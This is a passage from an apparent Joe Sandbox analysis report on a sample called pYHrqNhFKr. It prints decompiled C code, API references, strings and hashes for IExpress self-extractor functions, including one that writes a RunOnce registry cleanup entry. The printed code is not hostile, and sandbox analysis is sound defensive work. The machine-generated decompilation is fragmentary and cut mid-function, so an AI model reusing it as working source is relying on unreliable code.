						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x8a87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x8a88c0);
					_t61 = 0x8a88c0;
					_t4 =  &(_t61[1]); // 0x8a88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x8a88c0; // 0x1151181
					_t44 = CharPrevA(0x8a88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x8a88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x008a4234
0x008a423c
0x008a4240
0x008a43b2
0x008a43b7
0x008a43c0
0x00000000
0x008a43c5
0x008a424c
0x008a4252
0x008a4257
0x008a43a4
0x008a43a5
0x008a43ab
0x00000000
0x008a43ab
0x008a4263
0x008a4269
0x008a426e
0x00000000
0x00000000
0x008a427a
0x008a4280
0x008a4285
0x00000000
0x00000000
0x008a428d
0x008a4293
0x008a42e6
0x008a42e9
0x008a42ef
0x008a42f4
0x008a42f7
0x008a4300
0x008a4307
0x008a430e
0x008a4315
0x008a431c
0x008a4322
0x008a4326
0x008a432d
0x008a432d
0x008a432f
0x008a4334
0x008a4343
0x008a4349
0x008a434d
0x008a4354
0x008a4354
0x008a435d
0x008a436e
0x008a436e
0x008a437d
0x008a4383
0x008a4387
0x008a438e
0x008a438e
0x008a4387
0x008a4391
0x008a4399
0x00000000
0x008a4295
0x008a429f
0x008a42a5
0x008a42aa
0x008a42aa
0x008a42ad
0x008a42ad
0x008a42af
0x008a42b0
0x008a42b6
0x008a42c2
0x008a42c8
0x008a42ce
0x008a42e4
0x008a42e4
0x00000000
0x008a42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 008A4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 008A424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 008A4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 008A427A
GetTempPathA.KERNEL32(00000104,008A88C0,?,00000001), ref: 008A429F
CharPrevA.USER32(008A88C0,01151181,?,00000001), ref: 008A42C2
CharPrevA.USER32(008A88C0,00000000,?,00000001), ref: 008A42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008A4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008A43A5

Strings

SHGetPathFromIDList, xrefs: 008A4274
SHBrowseForFolder, xrefs: 008A4246
SHELL32.DLL, xrefs: 008A422F

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: c7cea36ad100acae291675fcc5a7329ed168ebfa0cab1ced67c39205097a1f34
Instruction ID: 63aa87dbe3ed9e4cdacbcc41c74f251d96f038d62d1cbe9ce33e1dfef0c10c85
Opcode Fuzzy Hash: c7cea36ad100acae291675fcc5a7329ed168ebfa0cab1ced67c39205097a1f34
Instruction Fuzzy Hash: 4B41A0B4A00204EFFB119BA4DC98A7E7BA4FB8B344F141169EA41E2B51CFB98C05C761

Uniqueness

Uniqueness Score: -1.00%

Function 008A2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E008A2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E008A1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E008A658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E008A658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x8a1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E008A1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E008A6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x008a2773
0x008a277e
0x008a2785
0x008a278a
0x008a278d
0x008a2790
0x008a2792
0x008a2798
0x008a279d
0x008a28b2
0x00000000
0x008a27a3
0x008a27a3
0x008a27af
0x008a27c2
0x008a27c8
0x008a27cd
0x008a27d5
0x008a28b7
0x008a28b9
0x00000000
0x008a27db
0x008a27dd
0x008a28aa
0x00000000
0x008a27e3
0x008a27e3
0x008a27ec
0x008a27f8
0x008a2803
0x008a280b
0x008a2831
0x008a28c3
0x008a28c9
0x008a28cd
0x008a2837
0x008a285a
0x008a285c
0x008a2865
0x008a2892
0x008a2895
0x00000000
0x00000000
0x008a2867
0x008a2878
0x008a288c
0x00000000
0x008a287a
0x008a2880
0x008a2885
0x008a2897
0x008a2899
0x008a2899
0x008a2878
0x008a2865
0x008a28a0
0x008a28bf
0x008a28c1
0x00000000
0x00000000
0x008a28c1
0x008a2831
0x008a27dd
0x008a27d5
0x008a28e5

APIs

CharUpperA.USER32(8481BC1D,00000000,00000000,00000000), ref: 008A27A8
CharNextA.USER32(0000054D), ref: 008A27B5
CharNextA.USER32(00000000), ref: 008A27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2829
RegQueryValueExA.ADVAPI32(?,008A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008A28AA
GetSystemDirectoryA.KERNEL32 ref: 008A28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008A27E4

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 1e00194ada82850ddbf985cf87ca7ca56588b6c77d255039b47c91d23a4cb071
Instruction ID: 16e6be9bf0715b763732049c7518b57d65b77edf58d23bdc494ccf5c9f2edafe
Opcode Fuzzy Hash: 1e00194ada82850ddbf985cf87ca7ca56588b6c77d255039b47c91d23a4cb071
Instruction Fuzzy Hash: C241A271A0012CABFB289B68DC85AFA77BDFB17700F0440A9F545D2900DB748E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 008A2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E008A2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x8a8004; // 0x8481bc1d
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x8a8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E008A658A( &_v268, 0x104, 0x8a1140);
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
							E008A171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E008A6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x008a2272
0x008a2277
0x008a2279
0x008a2283
0x008a2289
0x008a22ab
0x008a22b1
0x008a22c4
0x008a22e0
0x008a22e6
0x008a22f5
0x008a230d
0x008a231c
0x008a231c
0x008a2321
0x008a233a
0x008a2342
0x008a2348
0x008a234b
0x008a234c
0x008a234c
0x008a234e
0x008a234f
0x008a236e
0x008a236e
0x008a237a
0x008a2380
0x008a2380
0x008a2381
0x008a2381
0x008a238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008A22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 008A22D8
memset.MSVCRT ref: 008A22F5
GetSystemDirectoryA.KERNEL32 ref: 008A2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 008A236E
RegCloseKey.ADVAPI32(?), ref: 008A237A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A2321
wextract_cleanup0, xrefs: 008A227C, 008A22CD, 008A2363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008A2299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008A232D

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-1264114338
Opcode ID: 4d819338dfeeed19cdac834894e193bddf022351ac884bd4213d7b5ce107714d
Instruction ID: e3af50b51efd5e731bcfdae234d8d89af91b90d4d011e34462654a12ba56d826
Opcode Fuzzy Hash: 4d819338dfeeed19cdac834894e193bddf022351ac884bd4213d7b5ce107714d
Instruction Fuzzy Hash: 1231C871E00218ABEB219B55DC49FEB777CFB17700F0401A5B90DE6950EB74AB88CA60

Uniqueness

Uniqueness Score: -1.00%

Function 008A3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E008A3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x8a8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x8a8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E008A43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x8a8d4c);
					SetWindowTextA(_t33, "siga30");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x8a88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E008A30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x008a3108
0x008a310b
0x008a31b7
0x008a31ca
0x008a31d0
0x008a31d0
0x008a31da
0x00000000
0x008a31da
0x008a3111
0x008a3114
0x008a3136
0x008a3136
0x008a3138
0x008a313b
0x008a3141
0x00000000
0x008a3143
0x008a3116
0x008a311b
0x008a314b
0x008a3151
0x008a3158
0x008a316a
0x008a3176
0x008a317d
0x008a318b
0x008a319e
0x008a31a3
0x00000000
0x008a31ad
0x008a3120
0x00000000
0x00000000
0x008a312a
0x008a3134
0x00000000
0x00000000
0x00000000
0x008a3134
0x008a312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 008A313B
GetDesktopWindow.USER32 ref: 008A314B
SetDlgItemTextA.USER32(?,00000834), ref: 008A316A
SetWindowTextA.USER32(?,siga30), ref: 008A3176
SetForegroundWindow.USER32(?), ref: 008A317D
GetDlgItem.USER32(?,00000834), ref: 008A3185
GetWindowLongA.USER32(00000000,000000FC), ref: 008A3190
SetWindowLongA.USER32(00000000,000000FC,008A30C0), ref: 008A31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008A31CA

Strings

siga30, xrefs: 008A3170

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: siga30
API String ID: 3785188418-2499866817
Opcode ID: 38fd97513ea9394f6c2ab10c193862230f5d917c309e75e9d70a0fbad1f1f044
Instruction ID: dafcd218e84b840f97702b52df3aa5ca2ad1cff48f128fb64397105af857ea80
Opcode Fuzzy Hash: 38fd97513ea9394f6c2ab10c193862230f5d917c309e75e9d70a0fbad1f1f044
Instruction Fuzzy Hash: 9B11D031648215FBFB215F64EC0CBAA3AA4FB4B720F104621F926D1DE0DBB98A51C752

Uniqueness

Uniqueness Score: -1.00%

Function 008A468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E008A468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x008a4699
0x008a469b
0x008a46a9
0x008a46af
0x008a46b4
0x008a46bc
0x008a46f9
0x00000000
0x008a46f9
0x008a46d9
0x008a46dd
0x00000000
0x00000000
0x008a46e5
0x008a46ef
0x00000000
0x008a46f5
0x008a46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
memcpy_s.MSVCRT ref: 008A46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

Strings

TITLE, xrefs: 008A469D, 008A46C0
siga30, xrefs: 008A46E4

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$siga30
API String ID: 3370778649-532272691
Opcode ID: de550cc17a2cdd3ac288afee4a300224efc980a4b3cb87f8f6103334d1d35835
Instruction ID: 0fd5c7e88121fc89fcc9a806c55b9f7257e2e8a9c586386da2e2609788eb0090
Opcode Fuzzy Hash: de550cc17a2cdd3ac288afee4a300224efc980a4b3cb87f8f6103334d1d35835
Instruction Fuzzy Hash: E80186362442107BF7241BA59C4DF7B7E2CFBD7B52F044024FA4AD6950DAE18841C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 008A17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E008A17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x8aa288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E008A6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x008a17f6
0x008a17fd
0x008a1805
0x008a180b
0x008a180d
0x008a1815
0x008a1818
0x008a1820
0x008a1824
0x008a182c
0x008a1832
0x008a1837
0x008a1851
0x008a1854
0x008a185d
0x008a1862
0x008a186c
0x008a1872
0x008a1877
0x008a187e
0x008a187e
0x008a1883
0x008a1883
0x008a185d
0x008a188a
0x008a188a
0x008a18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008A18DD), ref: 008A181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008A182C
AllocateAndInitializeSid.ADVAPI32(008A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008A18DD), ref: 008A1855
FreeSid.ADVAPI32(?,?,?,?,008A18DD), ref: 008A1883
FreeLibrary.KERNEL32(00000000,?,?,?,008A18DD), ref: 008A188A

Strings

CheckTokenMembership, xrefs: 008A1826
advapi32.dll, xrefs: 008A1810

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 778b33b68157d36b584d68a21b4394491599be2eb71faa94b944e5b8ef035939
Instruction ID: b303766766966bd0d98e32e6286a88917f1dae7be15b7413ecab2fa68dd8fde8
Opcode Fuzzy Hash: 778b33b68157d36b584d68a21b4394491599be2eb71faa94b944e5b8ef035939
Instruction Fuzzy Hash: 1B119375E00209EBEB149FA4DC49ABEBB78FF4A710F100169FA11E3A90DB348D04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008A3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E008A43D0(_t24, _t12);
					SetWindowTextA(_t24, "siga30");
					SetDlgItemTextA(_t24, 0x838,  *0x8a9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x8a91dc = 1;
					goto L8;
				}
				return 0;
			}

0x008a3459
0x008a345c
0x008a34d8
0x008a34de
0x00000000
0x008a34e0
0x008a345e
0x008a3463
0x008a349a
0x008a34a0
0x008a34a7
0x008a34b2
0x008a34c4
0x008a34cb
0x00000000
0x008a34cb
0x008a3468
0x008a346e
0x008a3474
0x00000000
0x00000000
0x008a347c
0x008a348c
0x008a3490
0x00000000
0x008a3496
0x008a3484
0x00000000
0x00000000
0x008a3486
0x00000000
0x008a3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 008A3490
GetDesktopWindow.USER32 ref: 008A349A
SetWindowTextA.USER32(?,siga30), ref: 008A34B2
SetDlgItemTextA.USER32(?,00000838), ref: 008A34C4
SetForegroundWindow.USER32(?), ref: 008A34CB
EndDialog.USER32(?,00000002), ref: 008A34D8

Strings

siga30, xrefs: 008A34AC

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: siga30
API String ID: 852535152-2499866817
Opcode ID: d7c2487f96d15ef890bf2c0e7a976b21b8b2821ab68d669ac775e41fa4bbd6df
Instruction ID: dbcb019d0d4352430bc307d760bc493499a6496cc719170c56610b62f4fbebc5
Opcode Fuzzy Hash: d7c2487f96d15ef890bf2c0e7a976b21b8b2821ab68d669ac775e41fa4bbd6df
Instruction Fuzzy Hash: 7F01B131245118ABFB2A5F68DC0C9AD3A64FB1F740F104011F947C6DA0DB758F42CB89

Uniqueness

Uniqueness Score: -1.00%

Function 008A2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E008A2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x8a8004; // 0x8481bc1d
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x8a9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E008A1680(_t65, E008A17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E008A65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E008A1680(_t65, E008A17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
